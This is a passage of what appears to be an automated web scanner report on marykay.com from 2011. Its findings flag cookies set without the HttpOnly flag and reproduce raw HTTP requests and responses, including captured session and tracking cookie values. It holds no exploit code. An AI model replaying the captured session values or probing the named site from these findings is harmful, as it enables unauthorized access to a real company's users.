HTTP/1.1 302 Found Cache-Control: private Content-Length: 137 Content-Type: text/html; charset=utf-8 Location: /default.aspx?pid=mk Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Set-Cookie: Subsidiary=US; path=/Set-Cookie: TLTHID=9C5046FD4D123B0E95A0D3931B51113E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:44 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/ <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/default.aspx?pid=mk">here</a>.</h2> </body></html>
13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CONTENT/HPflash/Thumbs/tb_eyebundles.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 880 Content-Type: image/jpeg Last-Modified: Tue, 07 Jun 2011 19:44:24 GMT Accept-Ranges: bytes ETag: "8661ea4d4b25cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=B0890FBE43C33E288B82AEB1B9B92B68; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CONTENT/HPflash/Thumbs/tb_makeupartist.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 960 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:22:36 GMT Accept-Ranges: bytes ETag: "5fe4339c621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=D17FE5DF44B2B04AF2B926961FD1F468; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 920 Content-Type: image/jpeg Last-Modified: Mon, 15 Aug 2011 19:40:43 GMT Accept-Ranges: bytes ETag: "ff998738835bcc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=0F87CA454A59967B490C06993C603D8E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CONTENT/HPflash/Thumbs/tb_twrandr.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=8BD67EF641C6E545281FCD8A9E8619A7; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 848 Content-Type: image/jpeg Last-Modified: Mon, 01 Aug 2011 21:07:50 GMT Accept-Ranges: bytes ETag: "5da24128f50cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=CCFC47FF43ECAF98B4F799BC3EFBF379; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................#.....[SNIP]...
13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Common/SiteCatalyst/marykaycom/s_code.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Common/SiteCatalyst/marykaycom/s_code.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41434 Content-Type: application/x-javascript Last-Modified: Thu, 14 Jul 2011 12:43:01 GMT Accept-Ranges: bytes ETag: "8078f2902342cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ /* SiteCatalyst code version: H.23.3. Copyright 1996-2011 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ***********...[SNIP]...
13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/245_eyeColorBundle.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/245_eyeColorBundle.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 45207 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT Accept-Ranges: bytes ETag: "9b534f2b621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C626A75243F4FAE68012C595A3FF22D3; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.....x....XT..?z..F@BJBJRPzP.E:...nI.A....T..AB.$.)I.K ......../.|..............9{.....X...9....j.h.....7.H.....a........9&/.{G71.$.l...,.......y.....O@TT.._.OP....q.vt7..qtca.bB[.a.f.j..n....*..u...[SNIP]...
13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/254_makeUpArtistLooks.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/254_makeUpArtistLooks.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=A54BE6714B423AFBADF1DD9C59C8A29F; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 47134 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT Accept-Ranges: bytes ETag: "6318542b621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:46:00 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/ CWS.Z...x...u\T..7~.$.)....i..i....SdDAE:..n..TA..EiAD@EDx.........{.?..>w......k...k..... .t..."p....... .J#2...[Z..K.P.:9:{..-.j[OOWAvv...6.n6.w.vN...v..v..VP............Z. .A........... .63w........[SNIP]...
13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/324m_shopYourWay.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/324m_shopYourWay.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 33387 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 01 Sep 2011 15:00:31 GMT Accept-Ranges: bytes ETag: "4a6ad5e4b768cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.....x....<........=2".....BB QQ..[.k6.^...%.B..l.R....-iP.E.^....................|..y....y..uC.] ...@J.......q``@..D.`. .|.....{1...yzy.@..p....-..x......8?......h..[.... .. ..^..`.R...X...y.......[SNIP]...
13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/330m_%20FallTrend_eng.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/330m_%20FallTrend_eng.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 57149 Content-Type: application/x-shockwave-flash Last-Modified: Tue, 30 Aug 2011 17:20:26 GMT Accept-Ranges: bytes ETag: "1d37901b3967cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:55 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ CWS.,p..x..} <.[...}.N..."IQ.U(....PM..3.E ...J.vm....sK...fiOE...{...3..QM.{..........9....,.9..L0`j..:.(.. ....$wvv.SjH.$......6>*..:.......3.an.`.[... .rC@.....n!............NP...D...m..6..F.<..7....[SNIP]...
13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/373_TWNightCmpx.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/373_TWNightCmpx.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41595 Content-Type: application/x-shockwave-flash Last-Modified: Wed, 20 Jul 2011 19:27:10 GMT Accept-Ranges: bytes ETag: "94cc2051347cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:57 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ CWS.....x...wXS..7...4A..i...; ....*.$Hob. ...U...A...HQ@....* RU:..w'...y.u.......Fw.g.*3k.....A.P.F.x3......(.....'..3..N2.J*..n..>2`K.....SFP......E.<... KKK. ........>..}m...}...Xq...}..Q..(.wVl.....[SNIP]...
13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/502_mascaraWardrobe.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/502_mascaraWardrobe.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=19C9D0014D75852EFB8C9087C106B6A5; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 72922 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 02 Jun 2011 09:19:28 GMT Accept-Ranges: bytes ETag: "7387422c621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:55 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/ CWS..F..x..z. ....{q.....D..n..do..{....Rv...eo..G({..QV(..."._...?.....9.y.9.y..y.sn0..\..=..yb@......s... .fi%zCF....... .I0.xx..rqy{{sz.q:.Ys....pq.r..r.....N..>.N.L..0...............n~...C....X.G....[SNIP]...
13.227. http://www.marykay.com/Content/HPflash/502_moc.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/502_moc.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/502_moc.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 57038 Content-Type: application/x-shockwave-flash Last-Modified: Tue, 28 Jun 2011 20:41:18 GMT Accept-Ranges: bytes ETag: "3640a0bbd335cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/ CWS..k..x....\SI...Oz.E. M....."E.D..".DJ....AE......WQ.7l.".T. ..b.X...Fi.mIn.jt.......].9g...S.L.7......D....+.......cFj"....(..f..%Q.H{..........C..wT ..a.#@....|.#.#6..;. ......(.....Ct..:.N...3.....[SNIP]...
13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Content/HPflash/BoaB_miniAd.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Content/HPflash/BoaB_miniAd.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
